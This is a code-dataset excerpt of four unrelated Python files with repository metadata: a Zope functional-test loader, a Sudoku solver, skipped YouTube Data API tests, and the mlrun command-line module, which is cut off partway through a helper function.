356718cf26860a04d368a8e52a4dd33966b7d392 | 965 | py | Python | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | null | null | null | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | 5 | 2017-07-13T00:51:25.000Z | 2021-02-04T15:08:39.000Z | Products/CMFDefault/browser/membership/tests/test_authentication.py | zopefoundation/Products.CMFDefault | a176d9aac5a7e04725dbd0f7b76c6ac357062139 | [
"ZPL-2.1"
] | 3 | 2017-07-08T03:22:35.000Z | 2018-05-20T06:42:03.000Z | ##############################################################################
#
# Copyright (c) 2010 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
""" Test Products.CMFDefault.browser.authentication
"""
import unittest
from Testing import ZopeTestCase
from Products.CMFDefault.testing import FunctionalLayer
ftest_suite = ZopeTestCase.FunctionalDocFileSuite('authentication.txt')
ftest_suite.layer = FunctionalLayer
def test_suite():
return unittest.TestSuite((
ftest_suite,
))
| 33.275862 | 78 | 0.648705 |
5d258d5bf9ec4eaf286e61afb3b5ca967b6d188c | 1,388 | py | Python | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | 1 | 2022-01-26T16:33:45.000Z | 2022-01-26T16:33:45.000Z | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | null | null | null | py/solns/sudokuSolver/sudokuSolver.py | zcemycl/algoTest | 9518fb2b60fd83c85aeb2ab809ff647aaf643f0a | [
"MIT"
] | 1 | 2022-01-26T16:35:44.000Z | 2022-01-26T16:35:44.000Z | from collections import defaultdict
class Solution:
@staticmethod
def naive(board):
n = len(board)
rows = defaultdict(set)
cols = defaultdict(set)
sqs = defaultdict(set)
for r in range(n):
for c in range(n):
if board[r][c]!=".":
tmp = board[r][c]
rows[r].add(tmp)
cols[c].add(tmp)
sqs[r//3*3+c//3].add(tmp)
def valid(r,c,v):
return v not in rows[r] and v not in cols[c] and \
v not in sqs[r//3*3+c//3]
def recursive(r,c):
if r==n-1 and c==n:
return True
elif c==n:
c=0
r+=1
if board[r][c]!=".":
return recursive(r,c+1)
sqid = r//3*3+c//3
for v in range(1,10):
tmp = str(v)
if not valid(r,c,tmp):
continue
board[r][c] = tmp
rows[r].add(tmp)
cols[c].add(tmp)
sqs[sqid].add(tmp)
if recursive(r,c+1):
return True
board[r][c] = "."
rows[r].remove(tmp)
cols[c].remove(tmp)
sqs[sqid].remove(tmp)
return False
recursive(0,0) | 29.531915 | 62 | 0.386167 |
7ac7d89b06a3a3e1084aeb5b443022d63ebff43e | 4,093 | py | Python | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | foxylib/tools/googleapi/youtube/data/tests/test_dataapi_tool.py | foxytrixy-com/foxylib | 94b8c5b9f8b12423393c68f7d9f910258840ed18 | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
from functools import reduce
from pprint import pprint
from unittest import TestCase
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
import pytest
from googleapiclient.http import MediaFileUpload
from foxylib.tools.collections.iter_tool import IterTool
from foxylib.tools.googleapi.foxylib_googleapi import FoxylibGoogleapi
from foxylib.tools.googleapi.youtube.data.dataapi_tool import DataapiTool, LiveStreamingData
from foxylib.tools.googleapi.youtube.youtubeapi_tool import YoutubeapiTool
from foxylib.tools.log.foxylib_logger import FoxylibLogger
FILE_PATH = os.path.realpath(__file__)
REPO_DIR = reduce(lambda x, f: f(x), [os.path.dirname] * 7, FILE_PATH)
class TestNative(TestCase):
@pytest.mark.skip(reason="upload slow. too much quota (1600)")
def test_1_upload(self):
# https://www.youtube.com/watch?v=CxRIcOLLWZk
logger = FoxylibLogger.func_level2logger(self.test_1_upload, logging.DEBUG)
# video_id = 'ePnWBJnj7C0'
credentials = FoxylibGoogleapi.ServiceAccount.credentials(
scopes=["https://www.googleapis.com/auth/youtube.upload"],
)
# str_SCOPE = "drive.readonly"
# creds = GSSTool.username_scope2creds(FoxylibGoogleapi.OAuth.username(), str_SCOPE)
# service = build('drive', 'v3', http=creds.authorize(Http()), cache_discovery=False)
youtube_service = YoutubeapiTool.credentials2service(credentials)
request = youtube_service.videos().insert(
part="snippet,status",
body={
"snippet": {
"categoryId": "22",
"description": "Description of uploaded video.",
"title": "Test video upload.",
# 'liveBroadcastContent':'upcoming',
},
"status": {
"privacyStatus": "private",
}
},
# TODO: For this request to work, you must replace "YOUR_FILE"
# with a pointer to the actual file you are uploading.
media_body=MediaFileUpload("/Users/moonyoungkang/Downloads/lightning.mp4")
)
response = request.execute()
print(response)
class TestDataapiTool(TestCase):
@classmethod
def setUpClass(cls):
FoxylibLogger.attach_stderr2loggers(logging.DEBUG)
@pytest.mark.skip(reason='"activeLiveChatId" seems to have TTL. disappeared after not using for long time')
def test_01(self):
# https://www.youtube.com/watch?v=nHRKoNOQ56w
logger = FoxylibLogger.func_level2logger(self.test_01, logging.DEBUG)
video_id = 'SXfFccUDK68'
credentials = FoxylibGoogleapi.ServiceAccount.credentials()
youtube_service = YoutubeapiTool.credentials2service(credentials)
data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service)
logger.debug({'data':data})
chat_id = LiveStreamingData.data2chat_id(data)
# ref = 'Cg0KC25IUktvTk9RNTZ3KicKGFVDbXJscUZJS19RUUNzcjNGUkhhM09LdxILbkhSS29OT1E1Nnc'
ref = 'Cg0KC1NYZkZjY1VESzY4KicKGFVDYVlIYkVkcHJ1VFd5QkwxV0xHSHRidxILU1hmRmNjVURLNjg'
self.assertEqual(chat_id, ref)
# ptah-dev
# livestream data
@pytest.mark.skip(reason="'video_id' keep changing")
def test_02(self):
# https://www.youtube.com/watch?v=CxRIcOLLWZk
logger = FoxylibLogger.func_level2logger(self.test_02, logging.DEBUG)
video_id = 'ePnWBJnj7C0'
credentials = FoxylibGoogleapi.ServiceAccount.credentials()
youtube_service = YoutubeapiTool.credentials2service(credentials)
data = DataapiTool.video_id2live_streaming_data(video_id, youtube_service)
chat_id = LiveStreamingData.data2chat_id(data)
# logger.debug({'chat_id':chat_id})
# ref = 'Cg0KC0N4UkljT0xMV1prKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILQ3hSSWNPTExXWms'
ref = 'Cg0KC2VQbldCSm5qN0MwKicKGFVDTDI5X1pkaENHV3pjMTZ1NW04S19VURILZVBuV0JKbmo3QzA'
self.assertEqual(chat_id, ref)
| 40.524752 | 111 | 0.699243 |
4e85671c20826847b14ed12f241c3f4fc8fd2c61 | 32,312 | py | Python | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | mlrun/__main__.py | adiso75/mlrun | 0da2e72a1e2aa189074bd2ec059f2bc452f349cf | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import traceback
from ast import literal_eval
from base64 import b64decode, b64encode
from os import environ, path
from pprint import pprint
from subprocess import Popen
from sys import executable
import click
import yaml
from tabulate import tabulate
import mlrun
from .builder import upload_tarball
from .config import config as mlconf
from .db import get_run_db
from .k8s_utils import K8sHelper
from .model import RunTemplate
from .platforms import auto_mount as auto_mount_modifier
from .projects import load_project
from .run import get_object, import_function, import_function_to_dict, new_function
from .runtimes import RemoteRuntime, RunError, RuntimeKinds, ServingRuntime
from .secrets import SecretsStore
from .utils import (
RunNotifications,
dict_to_yaml,
get_in,
list2dict,
logger,
parse_versioned_object_uri,
run_keys,
update_in,
)
from .utils.version import Version
@click.group()
def main():
pass
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("url", type=str, required=False)
@click.option(
"--param",
"-p",
default="",
multiple=True,
help="parameter name and value tuples, e.g. -p x=37 -p y='text'",
)
@click.option("--inputs", "-i", multiple=True, help="input artifact")
@click.option("--outputs", "-o", multiple=True, help="output artifact/result for kfp")
@click.option("--in-path", help="default input path/url (prefix) for artifact")
@click.option("--out-path", help="default output path/url (prefix) for artifact")
@click.option(
"--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.."
)
@click.option("--uid", help="unique run ID")
@click.option("--name", help="run name")
@click.option("--workflow", help="workflow name/id")
@click.option("--project", help="project name/id")
@click.option("--db", default="", help="save run results to path or DB url")
@click.option(
"--runtime", "-r", default="", help="function spec dict, for pipeline usage"
)
@click.option(
"--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use"
)
@click.option(
"--hyperparam",
"-x",
default="",
multiple=True,
help="hyper parameters (will expand to multiple tasks) e.g. --hyperparam p2=[1,2,3]",
)
@click.option(
"--param-file", default="", help="path to csv table of execution (hyper) params"
)
@click.option(
"--selector",
default="",
help="how to select the best result from a list, e.g. max.accuracy",
)
@click.option(
"--hyper-param-strategy",
default="",
help="hyperparam tuning strategy list | grid | random",
)
@click.option(
"--hyper-param-options", default="", help="hyperparam options json string",
)
@click.option(
"--func-url",
"-f",
default="",
help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]",
)
@click.option("--task", default="", help="path/url to task yaml")
@click.option(
"--handler", default="", help="invoke function handler inside the code file"
)
@click.option("--mode", help="special run mode noctx | pass")
@click.option("--schedule", help="cron schedule")
@click.option("--from-env", is_flag=True, help="read the spec from the env var")
@click.option("--dump", is_flag=True, help="dump run results as YAML")
@click.option("--image", default="", help="container image")
@click.option("--kind", default="", help="serverless runtime kind")
@click.option("--source", default="", help="source code archive/git")
@click.option("--local", is_flag=True, help="run the task locally (ignore runtime)")
@click.option(
"--auto-mount", is_flag=True, help="add volume mount to job using auto mount option"
)
@click.option("--workdir", default="", help="run working directory")
@click.option("--label", multiple=True, help="run labels (key=val)")
@click.option("--watch", "-w", is_flag=True, help="watch/tail run log")
@click.option("--verbose", is_flag=True, help="verbose log")
@click.option(
"--scrape-metrics",
is_flag=True,
help="whether to add the `mlrun/scrape-metrics` label to this run's resources",
)
@click.argument("run_args", nargs=-1, type=click.UNPROCESSED)
def run(
url,
param,
inputs,
outputs,
in_path,
out_path,
secrets,
uid,
name,
workflow,
project,
db,
runtime,
kfp,
hyperparam,
param_file,
selector,
hyper_param_strategy,
hyper_param_options,
func_url,
task,
handler,
mode,
schedule,
from_env,
dump,
image,
kind,
source,
local,
auto_mount,
workdir,
label,
watch,
verbose,
scrape_metrics,
run_args,
):
"""Execute a task and inject parameters."""
out_path = out_path or environ.get("MLRUN_ARTIFACT_PATH")
config = environ.get("MLRUN_EXEC_CONFIG")
if from_env and config:
config = json.loads(config)
runobj = RunTemplate.from_dict(config)
elif task:
obj = get_object(task)
task = yaml.load(obj, Loader=yaml.FullLoader)
runobj = RunTemplate.from_dict(task)
else:
runobj = RunTemplate()
set_item(runobj.metadata, uid, "uid")
set_item(runobj.metadata, name, "name")
set_item(runobj.metadata, project, "project")
if label:
label_dict = list2dict(label)
for k, v in label_dict.items():
runobj.metadata.labels[k] = v
if workflow:
runobj.metadata.labels["workflow"] = workflow
if db:
mlconf.dbpath = db
if func_url or kind or image:
if func_url:
runtime = func_url_to_runtime(func_url)
kind = get_in(runtime, "kind", kind or "job")
if runtime is None:
exit(1)
else:
kind = kind or "job"
runtime = {"kind": kind, "spec": {"image": image}}
if kind not in ["", "local", "dask"] and url:
if path.isfile(url) and url.endswith(".py"):
with open(url) as fp:
body = fp.read()
based = b64encode(body.encode("utf-8")).decode("utf-8")
logger.info(f"packing code at {url}")
update_in(runtime, "spec.build.functionSourceCode", based)
url = ""
update_in(runtime, "spec.command", "")
elif runtime:
runtime = py_eval(runtime)
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
else:
runtime = {}
code = environ.get("MLRUN_EXEC_CODE")
if get_in(runtime, "kind", "") == "dask":
code = get_in(runtime, "spec.build.functionSourceCode", code)
if from_env and code:
code = b64decode(code).decode("utf-8")
if kfp:
print(f"code:\n{code}\n")
with open("main.py", "w") as fp:
fp.write(code)
url = url or "main.py"
if url:
if not name and not runtime:
name = path.splitext(path.basename(url))[0]
runobj.metadata.name = runobj.metadata.name or name
update_in(runtime, "spec.command", url)
if run_args:
update_in(runtime, "spec.args", list(run_args))
if image:
update_in(runtime, "spec.image", image)
set_item(runobj.spec, handler, "handler")
set_item(runobj.spec, param, "parameters", fill_params(param))
set_item(runobj.spec, hyperparam, "hyperparams", fill_params(hyperparam))
if hyper_param_options:
runobj.spec.hyper_param_options = py_eval(hyper_param_options)
set_item(runobj.spec.hyper_param_options, param_file, "param_file")
set_item(runobj.spec.hyper_param_options, hyper_param_strategy, "strategy")
set_item(runobj.spec.hyper_param_options, selector, "selector")
set_item(runobj.spec, inputs, run_keys.inputs, list2dict(inputs))
set_item(runobj.spec, in_path, run_keys.input_path)
set_item(runobj.spec, out_path, run_keys.output_path)
set_item(runobj.spec, outputs, run_keys.outputs, list(outputs))
set_item(
runobj.spec, secrets, run_keys.secrets, line2keylist(secrets, "kind", "source")
)
set_item(runobj.spec, verbose, "verbose")
set_item(runobj.spec, scrape_metrics, "scrape_metrics")
update_in(runtime, "metadata.name", name, replace=False)
update_in(runtime, "metadata.project", project, replace=False)
if kfp or runobj.spec.verbose or verbose:
print(f"MLRun version: {str(Version().get())}")
print("Runtime:")
pprint(runtime)
print("Run:")
pprint(runobj.to_dict())
try:
fn = new_function(runtime=runtime, kfp=kfp, mode=mode)
if workdir:
fn.spec.workdir = workdir
if auto_mount:
fn.apply(auto_mount_modifier())
if source:
supported_runtimes = [
"",
"local",
RuntimeKinds.job,
RuntimeKinds.remotespark,
]
if fn.kind not in supported_runtimes:
print(
f"source flag only works with the {','.join(supported_runtimes)} runtimes"
)
exit(1)
fn.spec.build.source = source
fn.spec.build.load_source_on_run = True
fn.is_child = from_env and not kfp
resp = fn.run(runobj, watch=watch, schedule=schedule, local=local)
if resp and dump:
print(resp.to_yaml())
except RunError as err:
print(f"runtime error: {err}")
exit(1)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("func_url", type=str, required=False)
@click.option("--name", help="function name")
@click.option("--project", help="project name")
@click.option("--tag", default="", help="function tag")
@click.option("--image", "-i", help="target image path")
@click.option(
"--source", "-s", default="", help="location/url of the source files dir/tar"
)
@click.option("--base-image", "-b", help="base docker image")
@click.option(
"--command",
"-c",
default="",
multiple=True,
help="build commands, e.g. '-c pip install pandas'",
)
@click.option("--secret-name", default="", help="container registry secret name")
@click.option("--archive", "-a", default="", help="destination archive for code (tar)")
@click.option("--silent", is_flag=True, help="do not show build logs")
@click.option("--with-mlrun", is_flag=True, help="add MLRun package")
@click.option("--db", default="", help="save run results to path or DB url")
@click.option(
"--runtime", "-r", default="", help="function spec dict, for pipeline usage"
)
@click.option(
"--kfp", is_flag=True, help="running inside Kubeflow Piplines, do not use"
)
@click.option("--skip", is_flag=True, help="skip if already deployed")
def build(
func_url,
name,
project,
tag,
image,
source,
base_image,
command,
secret_name,
archive,
silent,
with_mlrun,
db,
runtime,
kfp,
skip,
):
"""Build a container image from code and requirements."""
if db:
mlconf.dbpath = db
if runtime:
runtime = py_eval(runtime)
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
if kfp:
print("Runtime:")
pprint(runtime)
func = new_function(runtime=runtime)
elif func_url.startswith("db://"):
func_url = func_url[5:]
func = import_function(func_url)
elif func_url:
func_url = "function.yaml" if func_url == "." else func_url
func = import_function(func_url)
else:
print("please specify the function path or url")
exit(1)
meta = func.metadata
meta.project = project or meta.project or mlconf.default_project
meta.name = name or meta.name
meta.tag = tag or meta.tag
b = func.spec.build
if func.kind not in ["", "local"]:
b.base_image = base_image or b.base_image
b.commands = list(command) or b.commands
b.image = image or b.image
b.secret = secret_name or b.secret
if source.endswith(".py"):
if not path.isfile(source):
print(f"source file doesnt exist ({source})")
exit(1)
with open(source) as fp:
body = fp.read()
based = b64encode(body.encode("utf-8")).decode("utf-8")
logger.info(f"packing code at {source}")
b.functionSourceCode = based
func.spec.command = ""
else:
b.source = source or b.source
# todo: upload stuff
archive = archive or mlconf.default_archive
if archive:
src = b.source or "./"
logger.info(f"uploading data from {src} to {archive}")
target = archive if archive.endswith("/") else archive + "/"
target += f"src-{meta.project}-{meta.name}-{meta.tag or 'latest'}.tar.gz"
upload_tarball(src, target)
# todo: replace function.yaml inside the tar
b.source = target
if hasattr(func, "deploy"):
logger.info("remote deployment started")
try:
func.deploy(
with_mlrun=with_mlrun, watch=not silent, is_kfp=kfp, skip_deployed=skip
)
except Exception as err:
print(f"deploy error, {err}")
exit(1)
state = func.status.state
image = func.spec.image
if kfp:
with open("/tmp/state", "w") as fp:
fp.write(state or "none")
full_image = func.full_image_path(image) or ""
with open("/tmp/image", "w") as fp:
fp.write(image)
with open("/tmp/fullimage", "w") as fp:
fp.write(full_image)
print("full image path = ", full_image)
print(f"function built, state={state} image={image}")
else:
print("function does not have a deploy() method")
exit(1)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("spec", type=str, required=False)
@click.option("--source", "-s", default="", help="location/url of the source")
@click.option(
"--func-url",
"-f",
default="",
help="path/url of function yaml or function " "yaml or db://<project>/<name>[:tag]",
)
@click.option("--dashboard", "-d", default="", help="nuclio dashboard url")
@click.option("--project", "-p", default="", help="project name")
@click.option("--model", "-m", multiple=True, help="model name and path (name=path)")
@click.option("--kind", "-k", default=None, help="runtime sub kind")
@click.option("--tag", default="", help="version tag")
@click.option("--env", "-e", multiple=True, help="environment variables")
@click.option("--verbose", is_flag=True, help="verbose log")
def deploy(spec, source, func_url, dashboard, project, model, tag, kind, env, verbose):
"""Deploy model or function"""
if func_url:
runtime = func_url_to_runtime(func_url)
if runtime is None:
exit(1)
elif spec:
runtime = py_eval(spec)
else:
runtime = {}
if not isinstance(runtime, dict):
print(f"runtime parameter must be a dict, not {type(runtime)}")
exit(1)
if verbose:
pprint(runtime)
pprint(model)
# support both v1 & v2+ model struct for backwards compatibility
if runtime and runtime["kind"] == RuntimeKinds.serving:
print("Deploying V2 model server")
function = ServingRuntime.from_dict(runtime)
if model:
# v2+ model struct (list of json obj)
for _model in model:
args = json.loads(_model)
function.add_model(**args)
else:
function = RemoteRuntime.from_dict(runtime)
if kind:
function.spec.function_kind = kind
if model:
# v1 model struct (list of k=v)
models = list2dict(model)
for k, v in models.items():
function.add_model(k, v)
function.spec.source = source
if env:
for k, v in list2dict(env).items():
function.set_env(k, v)
function.verbose = verbose
try:
addr = function.deploy(dashboard=dashboard, project=project, tag=tag)
except Exception as err:
print(f"deploy error: {err}")
exit(1)
print(f"function deployed, address={addr}")
with open("/tmp/output", "w") as fp:
fp.write(addr)
with open("/tmp/name", "w") as fp:
fp.write(function.status.nuclio_name)
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("pod", type=str)
@click.option("--namespace", "-n", help="kubernetes namespace")
@click.option(
"--timeout", "-t", default=600, show_default=True, help="timeout in seconds"
)
def watch(pod, namespace, timeout):
"""Read current or previous task (pod) logs."""
k8s = K8sHelper(namespace)
status = k8s.watch(pod, namespace, timeout)
print(f"Pod {pod} last status is: {status}")
@main.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("kind", type=str)
@click.argument("name", type=str, default="", required=False)
@click.option("--selector", "-s", default="", help="label selector")
@click.option("--namespace", "-n", help="kubernetes namespace")
@click.option("--uid", help="unique ID")
@click.option("--project", "-p", help="project name")
@click.option("--tag", "-t", default="", help="artifact/function tag")
@click.option("--db", help="db path/url")
@click.argument("extra_args", nargs=-1, type=click.UNPROCESSED)
def get(kind, name, selector, namespace, uid, project, tag, db, extra_args):
"""List/get one or more object per kind/class."""
if db:
mlconf.dbpath = db
if kind.startswith("po"):
k8s = K8sHelper(namespace)
if name:
resp = k8s.get_pod(name, namespace)
print(resp)
return
items = k8s.list_pods(namespace, selector)
print(f"{'state':10} {'started':16} {'type':8} name")
for i in items:
task = i.metadata.labels.get("mlrun/class", "")
if task:
name = i.metadata.name
state = i.status.phase
start = ""
if i.status.start_time:
start = i.status.start_time.strftime("%b %d %H:%M:%S")
print(f"{state:10} {start:16} {task:8} {name}")
elif kind.startswith("runtime"):
run_db = get_run_db(db or mlconf.dbpath)
if name:
# the runtime identifier is its kind
runtime = run_db.get_runtime(kind=name, label_selector=selector)
print(dict_to_yaml(runtime))
return
runtimes = run_db.list_runtimes(label_selector=selector)
print(dict_to_yaml(runtimes))
elif kind.startswith("run"):
run_db = get_run_db()
if name:
run = run_db.read_run(name, project=project)
print(dict_to_yaml(run))
return
runs = run_db.list_runs(uid=uid, project=project, labels=selector)
df = runs.to_df()[
["name", "uid", "iter", "start", "state", "parameters", "results"]
]
# df['uid'] = df['uid'].apply(lambda x: f'..{x[-6:]}')
df["start"] = df["start"].apply(time_str)
df["parameters"] = df["parameters"].apply(dict_to_str)
df["results"] = df["results"].apply(dict_to_str)
print(tabulate(df, headers="keys"))
elif kind.startswith("art"):
run_db = get_run_db()
artifacts = run_db.list_artifacts(
name, project=project, tag=tag, labels=selector
)
df = artifacts.to_df()[
["tree", "key", "iter", "kind", "path", "hash", "updated"]
]
df["tree"] = df["tree"].apply(lambda x: f"..{x[-8:]}")
df["hash"] = df["hash"].apply(lambda x: f"..{x[-6:]}")
print(tabulate(df, headers="keys"))
elif kind.startswith("func"):
run_db = get_run_db()
if name:
f = run_db.get_function(name, project=project, tag=tag)
print(dict_to_yaml(f))
return
functions = run_db.list_functions(name, project=project, labels=selector)
lines = []
headers = ["kind", "state", "name:tag", "hash"]
for f in functions:
name = get_in(f, "metadata.name")
tag = get_in(f, "metadata.tag", "")
line = [
get_in(f, "kind", ""),
get_in(f, "status.state", ""),
f"{name}:{tag}",
get_in(f, "metadata.hash", ""),
]
lines.append(line)
print(tabulate(lines, headers=headers))
else:
print(
"currently only get pods | runs | artifacts | func [name] | runtime are supported"
)
@main.command()
@click.option("--port", "-p", help="port to listen on", type=int)
@click.option("--dirpath", "-d", help="database directory (dirpath)")
def db(port, dirpath):
"""Run HTTP api/database server"""
env = environ.copy()
if port is not None:
env["MLRUN_httpdb__port"] = str(port)
if dirpath is not None:
env["MLRUN_httpdb__dirpath"] = dirpath
cmd = [executable, "-m", "mlrun.api.main"]
child = Popen(cmd, env=env)
returncode = child.wait()
if returncode != 0:
raise SystemExit(returncode)
@main.command()
def version():
"""get mlrun version"""
print(f"MLRun version: {str(Version().get())}")
@main.command()
@click.argument("uid", type=str)
@click.option("--project", "-p", help="project name")
@click.option("--offset", type=int, default=0, help="byte offset")
@click.option("--db", help="api and db service path/url")
@click.option("--watch", "-w", is_flag=True, help="watch/follow log")
def logs(uid, project, offset, db, watch):
"""Get or watch task logs"""
mldb = get_run_db(db or mlconf.dbpath)
if mldb.kind == "http":
state = mldb.watch_log(uid, project, watch=watch, offset=offset)
else:
state, text = mldb.get_log(uid, project, offset=offset)
if text:
print(text.decode())
if state:
print(f"final state: {state}")
@main.command()
@click.argument("context", default="", type=str, required=False)
@click.option("--name", "-n", help="project name")
@click.option("--url", "-u", help="remote git or archive url")
@click.option("--run", "-r", help="run workflow name of .py file")
@click.option(
"--arguments",
"-a",
default="",
multiple=True,
help="Kubeflow pipeline arguments name and value tuples, e.g. -a x=6",
)
@click.option("--artifact-path", "-p", help="output artifacts path")
@click.option(
"--param",
"-x",
default="",
multiple=True,
help="mlrun project parameter name and value tuples, e.g. -p x=37 -p y='text'",
)
@click.option(
"--secrets", "-s", multiple=True, help="secrets file=<filename> or env=ENV_KEY1,.."
)
@click.option("--namespace", help="k8s namespace")
@click.option("--db", help="api and db service path/url")
@click.option("--init-git", is_flag=True, help="for new projects init git context")
@click.option(
"--clone", "-c", is_flag=True, help="force override/clone the context dir"
)
@click.option("--sync", is_flag=True, help="sync functions into db")
@click.option(
"--watch", "-w", is_flag=True, help="wait for pipeline completion (with -r flag)"
)
@click.option("--dirty", "-d", is_flag=True, help="allow git with uncommited changes")
@click.option("--git-repo", help="git repo (org/repo) for git comments")
@click.option(
"--git-issue", type=int, default=None, help="git issue number for git comments"
)
def project(
context,
name,
url,
run,
arguments,
artifact_path,
param,
secrets,
namespace,
db,
init_git,
clone,
sync,
watch,
dirty,
git_repo,
git_issue,
):
"""load and/or run a project"""
if db:
mlconf.dbpath = db
proj = load_project(context, url, name, init_git=init_git, clone=clone)
url_str = " from " + url if url else ""
print(f"Loading project {proj.name}{url_str} into {context}:\n")
if artifact_path and not ("://" in artifact_path or artifact_path.startswith("/")):
artifact_path = path.abspath(artifact_path)
if param:
proj.params = fill_params(param, proj.params)
if git_repo:
proj.params["git_repo"] = git_repo
if git_issue:
proj.params["git_issue"] = git_issue
commit = (
proj.params.get("commit")
or environ.get("GITHUB_SHA")
or environ.get("CI_COMMIT_SHA")
)
if commit:
proj.params["commit"] = commit
if secrets:
secrets = line2keylist(secrets, "kind", "source")
proj._secrets = SecretsStore.from_list(secrets)
print(proj.to_yaml())
if run:
workflow_path = None
if run.endswith(".py"):
workflow_path = run
run = None
args = None
if arguments:
args = fill_params(arguments)
print(f"running workflow {run} file: {workflow_path}")
message = run = ""
had_error = False
try:
run = proj.run(
run,
workflow_path,
arguments=args,
artifact_path=artifact_path,
namespace=namespace,
sync=sync,
dirty=dirty,
)
except Exception as exc:
print(traceback.format_exc())
message = f"failed to run pipeline, {exc}"
had_error = True
print(message)
print(f"run id: {run}")
gitops = (
git_issue
or environ.get("GITHUB_EVENT_PATH")
or environ.get("CI_MERGE_REQUEST_IID")
)
n = RunNotifications(with_slack=True, secrets=proj._secrets).print()
if gitops:
n.git_comment(git_repo, git_issue, token=proj.get_secret("GITHUB_TOKEN"))
if not had_error:
n.push_start_message(proj.name, commit, run)
else:
n.push(message)
if had_error:
exit(1)
if watch:
proj.get_run_status(run, notifiers=n)
elif sync:
print("saving project functions to db ..")
proj.sync_functions(save=True)
def validate_kind(ctx, param, value):
possible_kinds = RuntimeKinds.runtime_with_handlers()
if value is not None and value not in possible_kinds:
raise click.BadParameter(
f"kind must be one of {possible_kinds}", ctx=ctx, param=param
)
return value
@main.command()
@click.argument("kind", callback=validate_kind, default=None, required=False)
@click.argument("object_id", metavar="id", type=str, default=None, required=False)
@click.option("--api", help="api service url")
@click.option("--label-selector", "-ls", default="", help="label selector")
@click.option(
"--force", "-f", is_flag=True, help="clean resources in non-terminal states as well"
)
@click.option(
"--grace-period",
"-gp",
type=int,
# When someone triggers the cleanup manually we assume they want runtime resources in terminal state to be removed
# now, therefore not using here mlconf.runtime_resources_deletion_grace_period
default=0,
help="the grace period (in seconds) that will be given to runtime resources (after they're in terminal state) "
"before cleaning them. Ignored when --force is given",
show_default=True,
)
def clean(kind, object_id, api, label_selector, force, grace_period):
"""
Clean jobs resources
\b
Examples:
\b
# Clean resources for all runs of all runtimes
mlrun clean
\b
# Clean resources for all runs of a specific kind (e.g. job)
mlrun clean job
\b
# Clean resources for specific job (by uid)
mlrun clean mpijob 15d04c19c2194c0a8efb26ea3017254b
"""
mldb = get_run_db(api or mlconf.dbpath)
if kind:
if object_id:
mldb.delete_runtime_object(
kind=kind,
object_id=object_id,
label_selector=label_selector,
force=force,
grace_period=grace_period,
)
else:
mldb.delete_runtime(
kind=kind,
label_selector=label_selector,
force=force,
grace_period=grace_period,
)
else:
mldb.delete_runtimes(
label_selector=label_selector, force=force, grace_period=grace_period
)
@main.command(name="watch-stream")
@click.argument("url", type=str)
@click.option(
"--shard-ids",
"-s",
multiple=True,
type=int,
help="shard id to listen on (can be multiple)",
)
@click.option("--seek", help="where to start/seek (EARLIEST or LATEST)")
@click.option(
"--interval",
"-i",
default=3,
show_default=True,
help="interval in seconds",
type=int,
)
@click.option(
"--is-json",
"-j",
is_flag=True,
help="indicate the payload is json (will be deserialized)",
)
def watch_stream(url, shard_ids, seek, interval, is_json):
"""watch on a stream and print data every interval"""
mlrun.platforms.watch_stream(
url, shard_ids, seek, interval=interval, is_json=is_json
)
@main.command(name="config")
def show_config():
"""Show configuration & exit"""
print(mlconf.dump_yaml())
def fill_params(params, params_dict=None):
params_dict = params_dict or {}
for param in params:
i = param.find("=")
if i == -1:
continue
key, value = param[:i].strip(), param[i + 1 :].strip()
if key is None:
raise ValueError(f"cannot find param key in line ({param})")
